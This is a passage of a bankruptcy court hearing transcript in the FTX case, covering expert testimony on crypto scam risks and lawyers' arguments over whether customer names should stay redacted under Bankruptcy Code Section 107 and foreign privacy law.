10  technical sophistication.

11       Does that reflect what you're getting at?

12  Q    I understood you to be testifying that you thought FTX

13  consumers, debtors' customers, in particular, were, I think

14  the term you used was "less technical" and the rationale, I

15  think that you gave for that was they fell for investment --

16  they gave up their keys with an investment approach.  And I

17  was hoping you could explain what you meant by that.

18  A    So what I mean by that, the word "fell," I don't know

19  if --

20  Q    I don't think you used that, so go ahead.

21  A    Okay.  When asked the question about technical

22  sophistication of a crypto user, generally users who

23  participate in an exchange are not, by nature, and by

24  default, the most technically sophisticated, because an

25  exchange is designed to be an easier and less-manual way to

**A0617**

1   participate in cryptocurrency offerings and operations.

2       The technical aspect of how an exchange works requires

3   that you are surrendering your private keys to the eventual

4   wallet that your investment goes into, because the exchange

5   holds omnibus accounts and uses the entirety of funds for

6   different business processes.  And by nature of that, they

7   need your keys -- they need the keys to that wallet that

8   receives your funds.

9       As a general rule, the more technically sophisticated

10  and security-conscious crypto user will have a cold storage

11  or maintain possession of their keys at all times.  And I

12  think the second part of that is, my assessment of that is

13  based on -- was based on -- is based on FTX, their marketing

14  approach that specifically highlighted and ease of use and

15  not requiring a high level of technical acumen with digital

16  assets or cryptocurrency.

17  Q   Okay.  Thank you for that clarification.

18      Is that to say that in your view, someone who uses an

19  exchange is -- strike that.  Let me ask it this way.

20      In your experience, is it common for an individual who

21  is a novice in investing in cryptocurrency to hold, say, more

22  than $10 million in an exchange?

23  A   Can you repeat it one more time?

24  Q   Sure.  In your experience, is it common for an

25  individual who is a novice when it comes to cryptocurrency

1   investing to hold, say, $10 million or more in an exchange?

2   A    I wouldn't call that common, based on the amount of

3   crypto involved; I mean, that's a very high volume.  So, you

4   know, our investigations don't involve individuals with one

5   holding of that amount in an exchange.

6   Q    Just to make sure that I'm focused on the piece of my

7   question, would you expect for a person to have that -- an

8   individual to have that volume of investment in an exchange

9   if they had no experience in cryptocurrency?

10  A    I wouldn't expect it, but I wouldn't be surprised by

11  it.  There are individuals, high-net worth individuals who

12  got into cryptocurrency offerings at a very quick pace and

13  were caught up in the promise of cryptocurrency in many

14  circumstances.  So it's not a common practice, but it would

15  not be unheard of.

16  Q    In your experience, have you ever known an individual

17  cryptocurrency investor with a novice, new to cryptocurrency,

18  with $10 million or more in a single exchange?

19  A    Have I had personal experience with those

20  circumstances?

21  Q    Correct.

22  A    I have not.

23  Q    You testified earlier about, I believe you called it --

24  I may mischaracterize this -- the "mental state" of

25  individuals who -- strike that.  Let me restart and be a

1  little clearer.

2       You testified earlier about your views as to general

3  mental state of individuals who may be customers of debtors,

4  whose names are redacted in this case.  Do you think that

5  individuals whose -- who have money potentially tied up in

6  this bankruptcy would be more cautious of investment and

7  other types of scams moving forward?

8  A    I think that's a possibility.

9  Q    In your experience, has being the victim of some form

10  of cybercrime, let's say, made people more wary, more aware,

11  more cautious of potential future scams?

12  A    Yes.

13            MS. TOWNSEND:  No further questions, Your Honor.

14            THE COURT:  Okay.  Thank you.

15            Any other cross?

16        (No verbal response)

17            THE COURT:  Redirect?

18            MR. SASSON:  Your Honor, there's a short redirect.

19                    REDIRECT EXAMINATION

20  BY MR. SASSON:

21  Q    Mr. Sheridan, do you recall the line of questioning

22  from earlier by Ms. Sarkessian, counsel to the U.S. Trustee,

23  regarding moving assets to cold wallets?

24  A    Yes, sir.

25  Q    If FTX moved customer funds to cold wallets, does that

1   mean that those customers don't necessarily have other

2   cryptocurrency in hot wallets elsewhere?

3   A      It does not.

4   Q      So customers -- so a customer can be targeted with

5   respect to their crypto or fiat currency, completely

6   unrelated to the fact that FTX moved their assets to a cold

7   wallet in these bankruptcy cases?

8   A      Yes, sir.  Not only could their other assets be

9   targeted, but their profile would be used to facilitate

10  further criminal schemes; in other words, if an individual is

11  identified as a known cryptocurrency investor, it is possible

12  to identify and use their identity to perpetrate other

13  schemes leveraging that information.

14  Q      And if I were to stipulate to you here today that the

15  FTX debtors have moved, or are in the process of moving all

16  of their cryptocurrency to cold wallets in these bankruptcy

17  cases, does that change your conclusions at all, as set forth

18  in your declaration?

19  A      No, sir.

20  Q      All right.

21          MR. SASSON:  Nothing further, Your Honor.

22          THE COURT:  Thank you.

23          UNIDENTIFIED SPEAKER:  Nothing, Your Honor.

24          THE COURT:  Thank you.  You may step down,

25  Mr. Sheridan.  Thank you.

1           THE WITNESS:  Yes, sir.

2       (Witness excused)

3           MR. GLUECKSTEIN:  I think that concludes the

4   evidence, Your Honor.

5           THE COURT:  Okay.

6           MR. GLUECKSTEIN:  So I think we can move to

7   argument.  I will address first --

8           MS. SARKESSIAN:  Before we move to argument, Your

9   Honor, I just want to have a clarification.  There was an

10  affidavit that was attached to the motion of the Ad Hoc

11  Committee of an individual whose name was redacted.  They

12  have not introduced that person as a witness, so I just want

13  to clarify that that declaration will not be part of the

14  evidence at this hearing.

15          THE COURT:  It is not.

16          UNIDENTIFIED SPEAKER:  It's not, Your Honor.

17          MS. SARKESSIAN:  Thank you, Your Honor.

18          MS. TOWNSEND:  A similar clarification with

19  respect to the declaration of Philip James, which was also

20  attached, I think, as 1139.

21          MR. WENDER:  Just to get this on the record, Your

22  Honor, David Wender with Eversheds, we're not seeking to

23  introduce those.

24          With the evidence submitted by the Committee and

25  certain limitations of bringing an individual here without

1   the protections of hiding their identity, we did not move

2   forward with those and we're relying on the evidence admitted

3   in court today.

4            THE COURT:  All right.  Thank you.

5            That's not -- that declaration is not in evidence

6   either.

7            MR. WENDER:  Thank you, Your Honor.

8            THE COURT:  Go ahead, Mr. Glueckstein.

9            MR. GLUECKSTEIN:  Good morning, Your Honor.  Brian

10  Glueckstein, Sullivan & Cromwell, on behalf of the debtors.

11  Your Honor, by the joint motion that was filed by the debtors

12  and the Committee, the Movants jointly seek to extend the

13  period by which customer names should be redacted from public

14  filings in these cases, unless voluntarily disclosed by those

15  customers.  Your Honor, we submit, and Your Honor's heard

16  evidence on two independent bases to do so.

17           Section 107(b), Your Honor will recall that under

18  Section 107(b), an order was entered in January that

19  permitted the redaction of addresses, any known addresses of

20  the debtors' creditors and equity holders or natural persons

21  on a permanent basis, but limited the redaction of all

22  customer names and names, addresses, and emails of

23  institutional customers for an additional period, pursuant to

24  Section 107(b)(1) of the Bankruptcy Code, subject to

25  extension.

1          The basic premise of the Court's January order was

2   that the debtors' customer lists, including names and contact

3   information for both individuals and institutional customers

4   are an asset of the debtors' estates and a potential source

5   of value for creditors.  Mr. Cofsky, the debtors' investment

6   banker testified again yesterday before Your Honor that that

7   value remains today; in fact, Mr. Cofsky testified that the

8   debtors are actively running a process seeking to determine

9   how to maximize value from the core exchanges of FTX.com and

10  FTX U.S. to a variety of structures that could include their

11  sale as assets or reorganization.

12          The testimony yesterday from Mr. Cofsky was clear

13  that, as the debtors' investment banker, the customer lists

14  containing nine million names is a significant portion of

15  that value in any scenario, including, even, the possibility

16  of selling the customer lists with or without other assets.

17          Mr. Cofsky explained that the customer lists are

18  attractive assets for competitors and operators of other

19  exchanges and also explained why third parties would, in his

20  view, pay the debtors value for them.

21          Mr. Cofsky further described the analysis that he

22  and his team did and testified in his view the immediate

23  disclosure of any names from the customer lists, individual

24  or institutional, would harm the debtors' assets to maximize

25  the value of their assets.  The conclusion of Mr. Cofsky is

1   that a critical component of the strategy to monetize the

2   debtors' assets is the continued confidentiality of the

3   debtors' customer lists.  This testimony was unrefuted by the

4   objectors and amplified, further, the testimony that this

5   Court credited in January in issuing the prior order,

6   authorizing redactions of customer names.

7           Your Honor agreed in granting the original motion

8   that a customer list is something that is available to be

9   protected by Section 107(b) as a trade secret and that the

10  debtors' customer lists in this case met the standard.

11          Nothing has changed about the nature or

12  confidentiality of the debtors' customer lists since that

13  January hearing and we submit they remain protected by

14  Section 107(b).  The debtors are in a position to realize

15  value from these customer lists and exchange assets in

16  significant part because the customer names have been kept

17  confidential to date and the debtors should be permitted more

18  time to complete that process.

19          As Mr. Cofsky further testified yesterday, it is

20  not yet clear at this point, whether the disposition of the

21  customer lists will take place before or in connection with

22  the plan process; nonetheless, guided by the Court's prior

23  ruling, the Movants have only requested at this juncture to

24  formally extend the protection of redacting all customer

25  names under 107(b) for an additional three months from entry

1  of an order, although, it is possible, particularly based on

2  Mr. Cofsky's testimony, that a further extension may prove

3  ultimately necessary.

4        The Movants have been continuing to seek to strike

5  the correct balance to ensure the protection of their assets

6  and customer information and the continued redaction of names

7  is, in our view, appropriate to maintain that value.  This is

8  consistent with the Court's prior ruling in January and prior

9  rulings of this Court, including in the Cred case.

10        Neither the U.S. Trustee, nor the Media Objectors,

11  have offered anything new in opposition to the relief

12  requested under Section 107(b).  They offer no evidence and

13  their briefing merely recycles arguments that this Court

14  rejected in January and has been disproven by Mr. Cofsky's

15  testimony.

16        The Objectors here have no economic stake in the

17  outcome of these Chapter 11 cases and there's not a single

18  creditor or customer who has opposed the relief requested in

19  the motion, despite it being the customers who face the risks

20  both, financial and personal, from the forced, involuntary

21  disclosure of their names.  The Objectors continue to cite to

22  the general principles of the right to public access of

23  records and bankruptcy disclosure requirements.  They have

24  not provided evidence of any specific harm being suffered

25  that requires the disclosure of names and constitutional

1   addresses immediately, nor do they recognize, seemingly, the

2   Court's role in being able to modify those requirements for

3   cause shown, as the Court did with the prior order in

4   January.

5           As the Court and all parties in interest have been

6   able to observe, the debtors have been able to efficiently,

7   effectively, and completely administer these cases while

8   redacting customer names and preserving the integrity of the

9   customer lists.  Notices have been sent, pleadings have been

10  served, claims bar date procedures established, all with the

11  parameters of the relief obtained in the January order and

12  requested today to be extended.

13          Your Honor, we also submit there's no basis, as

14  suggested in the objections, for the Court to carve out

15  selective portions of the debtors' customers from the

16  redaction order, as suggested.  The somewhat arbitrary

17  request by the Media Objectors to reveal the debtors' top 50

18  creditor lists or top 50 institutional customers would

19  actually require disclosure of some of the most valuable

20  names on the list, because those are the customers with the

21  largest account balances, as of the petition date, as

22  Mr. Cofsky discussed yesterday.

23          We submit that would inflict a disproportionate

24  amount of harm and the asset value of the debtors' customer

25  lists and the Media Objectors cite no support for imposing

**A0627**

1  any such conditions.

2          Similarly, the United States Trustee requests

3  certain exceptions for insider of the debtors and when

4  customers would be identified in other filings in other

5  capacities.  The U.S. Trustee, likewise, offers no

6  justification for these carve-outs, pursuant to

7  Section 107(b).  The U.S. Trustee ignores the debtors' file

8  under seal, unredacted versions of all filings and the U.S.

9  Trustee has that information, to seek Court approval as

10  permitted by the order of any individual names it thinks need

11  to be disclosed.

12          Indeed, the debtors themselves, we have already

13  addressed a legitimate concern on this issue by generally

14  disclosing the names of former directors and officers who

15  might have been customers, but have been publicly identified,

16  such as Mr. Bankman-Fried and his inner circle.

17          Second, the U.S. Trustee offers no legal basis for

18  drawing the further distinction that compromising a portion

19  of the customer lists be determined protected information

20  under Section 107(b).  The debtors, in consultation with the

21  Committee, have determined that the continued redaction of

22  customer names for all purposes, thus protects the customers

23  from being identified and poached.  And there is no

24  justification presented to put those names into the record of

25  the Chapter 11 cases in any capacity.  We submit, Your Honor,

**A0628**

1    that under 107(b), the objections of the continued redaction

2    of the customer names, pursuant to that statute, should be

3    overruled.

4            I'm not going to address the substance of

5    Section 107(c); I'll leave that for the Committee's counsel

6    to address, but I will just note, Your Honor, from the

7    debtors' perspective, that we agree this relief is

8    appropriate under the circumstances.  Mr. Sheridan's

9    testimony confirms that the disclosure of individual names

10   will expose those customers to a very real risk of harm.

11   That's precisely the type of harm that Section 107(c) is

12   designed to protect against.

13           I think Mr. Sheridan this morning further

14   amplified the uniqueness of this situation presented by these

15   cases, which we have discussed before Your Honor previously.

16   If granted, Section 107(c) would permanently seal the

17   individual customer names, separate and apart from the relief

18   sought under Section 107(b).

19           Finally, Your Honor, we do address in your

20   briefing the debtors' position that the Court can and should

21   continue to permit the redaction of names and addresses of

22   the individual creditors; creditors who are not customers,

23   but who might be protected by the GDPR, and to the extent to

24   Japan, based on a review of the plain statutory language as

25   set forth.

1          If the other relief is granted, as requested in

2    this motion by the Movants, this is mere incremental relief

3    impacting individual, non-customer creditors in their

4    protected jurisdictions, who are most likely employees.

5    There is no need, in our view, to deviate from the

6    longstanding practice in this district to permit redactions

7    to comply with the GDPR to ensure that the debtor avoids the

8    risk of substantial fines or more in local jurisdictions.

9          The concern here, Your Honor, is not one of making

10   a finding of whether local data-privacy laws or U.S.

11   bankruptcy law trump.  On the facts of this case, again,

12   assuming -- we're just making the assumption for purposes of

13   argument -- the other relief is granted, we're talking about

14   a very narrow set of additional relief and the concern, of

15   course, is that irrespective of any findings of this Court,

16   that authorities in those local jurisdictions would seek to

17   take action against the debtors in these cases.

18          And as a result, Your Honor, we would ask, based

19   on the language set forth in the papers, that that small

20   incremental relief be granted as part of the package

21   requested today.  With that, Your Honor, subject to any

22   questions, I will turn it over to the Committee to

23   address 107(c).

24          THE COURT:  Thank you.

25          MR. PASQUALE:  It's still barely the morning, Your

1   Honor.  Good morning.  Ken Pasquale from Paul Hastings for

2   the Creditors Committee.

3           Your Honor, this Court previously recognized at

4   the prior hearing on these issues that Section 107(c)

5   contemplates sealing individual customer names, among other

6   types of personally identifying information, and the Court

7   referenced that, as does the statute, Section 1028(d) of the

8   Criminal Code, which specifies that type of personally

9   identifying information, including names.  So there's no

10  question that 107(c) provides the Court with the authority to

11  grant the relief requested in the joint motion.

12          Now, to be clear, and I say this in hearing some

13  of Ms. Sarkessian's questions, the requested relief in our

14  proposed order under 107(c) is to seal individual customer

15  names; it is not to seal creditor names, and, in fact,

16  creditor identities who are not customers have already been

17  disclosed by the debtors in the schedules.

18          Your Honor, the evidence before the Court today is

19  persuasive and completely uncontroverted, that there is a

20  significant risk to debtors' customers if their names are

21  disclosed, the debtors' customers in this case.  This is a

22  crypto bankruptcy case.  Mr. Sheridan testified about harms

23  to crypto bankruptcy customers in this case.  Not about other

24  cases, not about non-crypto cases, nothing to do with what we

25  are discussing today.

1          The objecting parties, Your Honor, quite

2   cavalierly, dismiss the risk of harm faced by the debtors'

3   individual customers, saying it's not undue risk; it's just

4   risk that everyone faces.

5          In their objection, the media parties, in

6   particular, appeal to "common sense" as the basis for many of

7   their positions.  But common sense, whatever their view is of

8   that, is not evidence and neither the Media Objectors, nor

9   the United States Trustee have presented any evidence to Your

10  Honor to contradict Mr. Sheridan's opinions and the proof in

11  the record.

12         Your Honor, just one example of that is the

13  experience in the Celsius bankruptcy cases.  We heard

14  questions today, and there was argument raised in their

15  objections, that, well, there's no proof that anyone fell for

16  those scams.  Well, no proof that people did not, either.

17  And the mere fact that they occurred, I mean, just dismissing

18  that risk, I find troubling and insensitive.

19         Once the genie is out of the bottle, Your Honor,

20  you can't put it back in and the risk will remain, should

21  names be disclosed, as occurred in the Celsius case, to those

22  customers forever.  That's a very significant risk.  That is

23  undue harm on the record before the Court.

24         Mr. Sheridan's testimony demonstrates that the

25  risk to FTX cryptocurrency exchange customers, in particular,

**A0632**

1  is significant given the nature of these cases and given the

2  nature of cryptocurrency.  Here, disclosing the names of the

3  debtors' customers would enable malefactors to match the name

4  with the value of the customers' assets on the exchange.

5          That information has already been disclosed on the

6  schedules anonymously, and so those who want to take the

7  time -- and as in Celsius, we know people will do this -- and

8  match the names with the value on the exchange; very much

9  akin to if a person's identity was disclosed with their bank

10  account holdings.  And as Mr. Sheridan explains, that would

11  cause significant harm to those customers.  It would enable a

12  malefactor to have that additional information to use the

13  dark web and other sources to identify and target those

14  individuals.

15          Further, Your Honor, it is illogical and

16  completely unsupported, again, no evidence presented, for the

17  Media Objectors to argue that crypto customers are

18  particularly savvy and would not likely fall for any of these

19  scams.  Well, as Mr. Sheridan testified, if that were the

20  case, the data wouldn't be what it is.  We wouldn't have the

21  volume of losses in the crypto space as a result of such

22  schemes.

23          Further, as Mr. Sheridan noted, and we all know

24  publicly, that FTX marketed to the mass market,

25  advertisements during the Super Bowl a couple of years ago

 1  and the like, which, as we cite in our reply papers, with

 2  particular focus on how easy it is and how you don't need to

 3  know anything to invest in cryptocurrency.  There are

 4  approximately nine million customer accounts; certainly,

 5  those are not all savvy investors who would not be subject to

 6  the types of scams that Mr. Sheridan testified about.

 7          Finally, Your Honor, our burden on this motion is

 8  not as the objectors contend, to show that there must be

 9  certainty of undue risk.  That's not the law and, in fact, no

10  support is offered in the objecting -- excuse me -- the

11  objectors' submissions in that regard.

12          To the contrary, in the Access to 2019 Statements

13  case, the Delaware District Court on an appeal held, quote:

14          "Section 107(c) references risk and assessment of

15  risk is forward-looking, while a specific potential harm must

16  be identified, the standard does not require evidence of

17  injury having occurred in the past or under similar

18  circumstances."  That's 585 B.R. 733, 751.

19          The debtors and Committee on our joint motion have

20  more than met our burden of proof showing the specific

21  potential harms that the debtors' individual customers face

22  from disclosure of their names.  Avoiding that harm, Your

23  Honor, keeping that genie in the bottle, far outweighs the

24  policy of open disclosure in these cases, in these

25  circumstances.

1            And, Your Honor, I'd be remiss without noting that

2    on Wednesday of this week, the Judge Shannon held in the

3    Bittrex cryptocurrency bankruptcy case that:

4            The sealing of creditors' names, individual

5    creditors' names was appropriate under 107(b) and 107(c), and

6    finding as to 107(c), that the crypto industry's primary

7    purpose of allowing immediate, instantaneous, and effectively

8    untraceable transfers of value differentiates it from other

9    industries and gives rise to more material risk of loss and

10   injury to creditors.

11           The same rationale applies here, Your Honor, and

12   we respectfully request that the joint motion be granted.

13   Thank you.

14           THE COURT:  Okay.  Thank you.

15           MR. WENDER:  Good afternoon, Your Honor.  David

16   Wender on behalf of the Ad Hoc Committee of Non-U.S.

17   Customers, and, Your Honor, I'll be brief.

18           As required by the Bankruptcy Rules, the Ad Hoc

19   Committee was required, its lawyers were required to file a

20   statement by name, address, and holdings of its individual

21   members.  The Ad Hoc Committee filed its motion to seal and

22   redact that information, Judge, anticipating, hopefully, that

23   the debtors would file their motions, which the joint motion

24   was forthcoming.  We've joined in that because we seek the

25   same relief.

**A0635**

 1              And in hearing Mr. Glueckstein's argument and some

 2    of the testimony -- some of the closings already, is that to

 3    ensure that a situation, we not voluntarily filed the 2019

 4    required by the Code, that our requirements to file 2019,

 5    which we actually supplemented earlier this week with new

 6    members, are similarly protected, such that our members, and

 7    even other customers who join other committees, or who might

 8    be obligated under the Code to submit information, are not

 9    forced to disclose information that's valuable to the

10    debtors.  They could generate value for recoveries later.

11              And it would disclose personally identifiable

12    information themselves and, in fact, we heard testimony,

13    potentially their customers.

14              And so I think that under both, 107(b) and 107(c),

15    the filings of the Ad Hoc Committee, for example, disclosing

16    under 2019 and similarly required filings, is not voluntary

17    disclosures of who we are, should be similarly protected.

18              Thank you, Your Honor.

19              THE COURT:  All right.  Thank you.

20              MS. SARKESSIAN:  And I can say good afternoon,

21    Your Honor.  Again, for the record, Juliet Sarkessian, on

22    behalf of the U.S. Trustee.

23              The debtors seek authority to redact from all

24    papers, filed or to be filed with this Court, the following

25    information, three categories:  number one, the names,

1  addresses, and email addresses of all customers, whether they

2  be natural persons or legal entities; number two, the names,

3  addresses, and email addresses of all creditors, be they

4  customers or not, or equity holders, that are natural

5  persons, if they are citizens of the United Kingdom, the

6  European Union, or Japan, and are covered by the EU or U.K.

7  General Data Protection Regulation, GDPR, or certain Japanese

8  laws; and the third category are the addresses and the email

9  addresses of customers and other creditors or equity holders,

10 who are individuals, regardless of their citizenship.

11        Your Honor, that last piece of it, Your Honor did

12 grant that in the order of January 20 on a permanent basis.

13 The other two categories were just for 90 days and we are now

14 back with a motion that the debtors, then -- actually, the

15 Movants, the debtors and the Committee, filed in April to

16 extend.  Well, the motion is to extend the categories for

17 another 90 days, but there's a little bit of a conflict,

18 because part of what they propose in the order is, on the one

19 hand, it says 90 days, but for customers who are natural

20 persons, there's another paragraph, paragraph 3, that is a

21 permanent redaction of their names.  So paragraph 2 says it's

22 for 90 days.  Paragraph 3 says it's permanent for you're a

23 customer who's a natural person.

24        My understanding, what was explained to me is

25 while paragraph 2 relates to 107(b) and paragraph 3 relates

1    to 107(c), the audience needs to be -- regardless, if Your

2    Honor is going to grant it, it has to be clear whether it's

3    permanent or for another 90 days.  That's certainly what we

4    would ask, that it be clear.

5             The documents that would be subject to these

6    redactions include documents that are the core of a

7    bankruptcy proceeding, that any debtor who is seeking

8    bankruptcy protection must file, including the creditor

9    matrix, statements of assets and liabilities, statement of

10   financial affairs, claims register, proofs of claim,

11   disclosures of professionals, such as the professionals'

12   connections with parties in interest who may be customers,

13   and then, of course, the Bankruptcy Rule 2019 statements, as

14   well as affidavits of service and many other documents.

15            It is black-letter law that bankruptcy proceedings

16   must be transparent and that transparency requires that

17   pleadings that are filed are filed on the public docket and

18   viewable by creditors, other parties in interest, and the

19   public, in general, unless certain enumerated exceptions

20   apply.

21            And, again, this is especially true for

22   information that's on, say, the schedules of assets and

23   liabilities, as well as the statement of financial affairs,

24   and very important in that statement of financial affairs is

25   the transfers within the one year that the debtors made to

1  insiders, and I'll go into more detail about that later, but

2  right now, except for Mr. Bankman-Fried's name and a few, you

3  know, three or four, of what the debtor believes are his

4  closest associates, the rest of the names of insiders who are

5  customers, be they individuals or be they institutions, have

6  been redacted.

7           So the grounds that the debtors assert -- excuse

8  me, the Movants assert for their position -- there's three --

9  to the extent that the persons or entities are customers,

10  they view their names being released as the equivalent of a

11  customer list that has value, either to sell or as part of a

12  reorganization.  And then, separately, under 107(c), as to

13  those customers or creditors who were natural persons --

14  wait, I just want to get clarification here.  I'm sorry.

15          Did counsel for the committee say that you were

16  not seeking to redact the names of creditors who are natural

17  persons if they're not customers?

18          UNIDENTIFIED SPEAKER:  Under 107(c).

19          MS. SARKESSIAN:  Right.  If they're not customers.

20          UNIDENTIFIED SPEAKER:  Under 107(c).

21          MS. SARKESSIAN:  Okay.  You are not seeking that,

22  okay.  And that is based on the idea of identity theft, based

23  on the name, coupled with the fact that they are a customer

24  of FTX or were a customer.  And then the third part of it is

25  those customers or other creditors who are natural persons

1   and are citizens of either, the EU, the U.K., or Japan, and

2   are covered by a foreign privacy law, that the Movants

3   believe prevents their -- or Movants already prevent the

4   disclosure of even their names; although, they have provided

5   no expert testimony whatsoever to interpret these foreign

6   laws.

7           So we're going through each part separately:  the

8   value of a customer list.  On direct, Mr. Cofsky testified

9   that the customer list has value both, in a 363 sale scenario

10  or a reorganization.  On cross-examination conducted by

11  counsel for the Media Objectors, he testified that while he

12  did not know if the customers used platforms of competitors,

13  but to the extent they do, that would degrade the value of

14  those customer names.  Mr. Cofsky also acknowledged that the

15  customers have not been able to use the debtors' platform

16  since November, since this case filed, and testified that the

17  longer that the platform is dormant, the more of the value of

18  the customer degrades, due to the fact that they may be using

19  competing platforms.

20          Now, while Mr. Cofsky may not be aware of how many

21  of FTX's customers use competitor's platforms, the

22  declaration of Mr. Sheridan, which has been admitted into

23  evidence and submitted by the debtors and the Committee to

24  support their motion, states in paragraph 25, quote.

25          "It is my understanding that a vast number of the

**A0640**

1  debtors' customers use other online platforms or exchanges to

2  hold assets, e.g., Coinbase, Metamask, et cetera."

3          Now, with respect to a reorganization situation,

4  Mr. Cofsky testified that he believed that the customer lists

5  would have value in that situation and on my cross-

6  examination -- I'm sorry, excuse me -- on cross-examination

7  by the Media (indiscernible) parties, he testified that he

8  had not conducted any survey or analysis to determine whether

9  the customers would want to stay with the debtors and use

10  their platform if and when the platform ever becomes

11  available again.

12          Now on my cross-examination, I asked Mr. Cofsky

13  why he believed that FTX customers who have had their

14  accounts frozen for now 6 months and potentially more than a

15  year by the time we get to the plan stage, the plan

16  solicitation stage with no access to their cash -- not just

17  their crypto, but no access to their cash or their crypto --

18  would continue to be customers of the debtor in a

19  reorganization.

20          And Mr. Cofsky's testimony in response was that

21  one of the reasons is that the customers would be getting

22  shares of the reorganized debtor, although, he admitted that

23  that was not a certainty.  He also testified it's possible

24  that customers would be getting stock in lieu of being paid

25  in full for what was in their account at the time that it was

1  frozen.

2          There is no way to know at this point, it would be

3  sheer speculation, that these customers having their assets

4  frozen for so long would want to continue to be customers of

5  a reorganized debtor based on the fact that they might be

6  getting stock, potentially in lieu of getting their cash and

7  their crypto, or some portion of the cash and the crypto that

8  was in their account.

9          Now, with respect to 107(c), Mr. Sheridan

10  testified that if the FTX customer accounts are in cold

11  wallets, which we know from (indiscernible) testifying

12  multiple times in this court that all, or almost all, at this

13  point, but I think it's all of the customer accounts are in

14  cold wallets and the customers have no way to access those

15  accounts.

16          Mr. Sheridan testified in that situation, they

17  could not -- customers could not be subject to having the

18  cash or the crypto in their FTX accounts stolen or, you know,

19  transferred over to them in any fashion because the

20  customers, they can't be subject to a scheme to transfer

21  crypto or cash from an account that they have no access to.

22  Now, I do understand, again, that he had testified or, in his

23  declaration, said that the vast majority of these individuals

24  also have accounts on other platforms.

25          And if I understand, it's possible that they could

1   be subject to some type of scam to access their funds on

2   those other platforms, although, again, having been, as Mr.

3   Sheridan testified on cross, having been subject to

4   essentially a scheme or something very bad happening in the

5   FTX case, that they might be more cautious going forward with

6   other schemes that could be pushed on them, with respect to

7   crypto.

8           THE COURT:  Well, just because they're in a cold

9   wallet now doesn't mean -- a scammer could easily contact

10  them, as was done in Celsius, or identifying themselves as

11  counsel to the debtor, saying, We need your keys.  We need to

12  get access to your wallet, so that we can make sure when the

13  time comes, we can release it to you.  And they gave it to

14  them and now the scammer comes back to the Bankruptcy Court

15  and says, you know, those assets are mine.  I've got the

16  keys.  They gave them to me.  I'm the one who gets that money

17  when the time comes to distribute again under the platform.

18          MS. SARKESSIAN:  Well, Your Honor, I guess maybe I

19  misunderstood.  I understood from what the witness said that

20  in platforms like FTX, that the individual doesn't actually

21  have access to their keys; that it's kept by FTX.  Maybe I

22  misunderstood that.

23          THE COURT:  I don't think he said that they don't.

24  He said that might be.  They might have given it to them.  It

25  doesn't mean they don't have access to it themselves, as

**A0643**

1    well.

2                  MS. SARKESSIAN:  Okay.

3                  THE COURT:  They might have given them over to the

4    debtors to say, Here's the access to our keys, but I still

5    have the key, too.  I'm not going to just give it to you.

6                  MS. SARKESSIAN:  You can see how much I know about

7    cryptocurrency; although, I have to say at this point, I'm

8    actually very glad that I know very little, frankly.  Well,

9    I'm sorry, I wish I knew more, without having invested; let

10   me put it that way.  I'm happy that I knew so little that I

11   was scared to invest.

12                 So, Your Honor, I think the Celsius situation is

13   obviously very unfortunate and, of course, everybody wants to

14   avoid that type of a situation.  But I think we have very,

15   very sophisticated counsel in this case representing both,

16   the debtors and the Committee, and I feel very confident that

17   they could come up with a way to, you know, prior to, if Your

18   Honor were to deny the motion, to prior to unredacting any

19   information, you know, that the debtor could communicate with

20   their customers in numerous ways to make sure that they were

21   aware that these types of things are possible and to be on

22   high alert and to, you know, sort of have a protocol that,

23   you know, nobody -- anybody that asks for your information,

24   it's not legitimate, other than this method, and the method

25   is there's going to be a bar date set with this Court and

1  you're going to get, you know, in the mail, a bar date

2  notice, a proof-of-claim form, and, you know, I'm sure there

3  are other things that can be done to -- again, there are a

4  lot of sophisticated attorneys here.  I'm sure there's a lot

5  of things that could be done to put out, you know, there

6  could be news releases, even, to warn people so that

7  everybody is on high alert.

8           Does that mean that there's not going to be one

9  person that, you know, that might happen to?  Of course, Your

10  Honor, we don't know that.

11          THE COURT:  Well, there could be many.  Even if

12  you're on high alert, I'm aware of very sophisticated law

13  firms who've been scammed.  It happens.  It doesn't matter

14  how sophisticated you are, how much you're on alert, it can

15  still happen.

16          MS. SARKESSIAN:  And we all get things every day.

17  We all get emails every day that if we clicked on them or

18  clicked on the link, I mean, bad things would happen.  I

19  mean, unfortunately in this society, everybody needs to be on

20  high alert all the time.

21          And, Your Honor, I take your point, of course, but

22  I think that things can be done to have that extra level of

23  protection.  I think in Celsius, I'm assuming there was

24  nothing sent out before this happened.  I know something was

25  after it happened, they sent out notices, but with hindsight

**A0645**

 1  now, we know that this is a possibility and we could take

 2  steps beforehand to protect, which wasn't done in Celsius,

 3  you know, because probably nobody thought this was a

 4  possibility.  I understand some of these scams were quite

 5  sophisticated; again, it was a very, very unfortunate

 6  situation.

 7          I also want to mention in this connection, the Ad

 8  Hoc Committee's objection makes an argument that, in was in

 9  the paragraph 27 of their reply -- I'm sorry, the reply, not

10  the motion -- that if you know that a corporation is a

11  customer -- so, they're trying to, you know, argue why the

12  corporate customer should get protection.  I think under

13  107(c), I believe, is what they were trying to argue.

14          Now, of course, 107(c) does not apply to

15  corporations.  It says right there, "individuals," but they

16  said in their reply that, well, if you knew who the

17  corporation was, you could somehow get access to their -- be

18  able to scam their employees.

19          Now Mr. Sheridan, I think, made it clear in his

20  testimony -- no, I wasn't talking of, no, you can't get to

21  the employees.  You can get to the customers of the customer;

22  in other words, FTX's customer, if you knew who they were,

23  you could maybe get to the customers of the customer, who

24  might be other corporations, depending on what the business

25  is.

**A0646**

1          I don't think there was any clear testimony,

2    honestly, Your Honor -- maybe I just didn't understand it --

3    as to why it would be any easier to find out the customers of

4    some -- of a corporation that's a customer of FTX versus any

5    other corporation, frankly.  I did not think there was clear

6    testimony on that, but, again, no matter what, 107(c) does

7    not apply to anyone who's not an individual.  I understand

8    the argument about the customer list being a valuable asset,

9    and we've separately addressed that, but 107(c) simply does

10   not apply to corporations.

11          Now, I'd like to talk about foreign law.  The

12   Movants say they are not asserting that foreign law should

13   control over U.S. law, but what they're asking the Court to

14   do is effectively that.  They're asking the Court to redact

15   information, much of which is required by the debtors to be

16   filed publicly in bankruptcy cases -- again, schedules and

17   statements of financial affairs, creditor matrix -- where the

18   professionals are required to disclose, as part of their

19   retention applications, arguing that it should not be

20   disclosed for those citizens who are -- so, those individuals

21   who were citizens of these foreign countries, because there's

22   a foreign law and that under that foreign law, that they

23   could, the debtors could potentially, potentially they could

24   be fined.

25          The effect of that is you are giving precedence to

**A0647**

 1   the foreign law over U.S. law and the debtors have not come

 2   forth with -- the Movants, excuse me -- have not come forward

 3   with one example of any situation in which a debtor in a U.S.

 4   bankruptcy proceeding was penalized or fined by some foreign

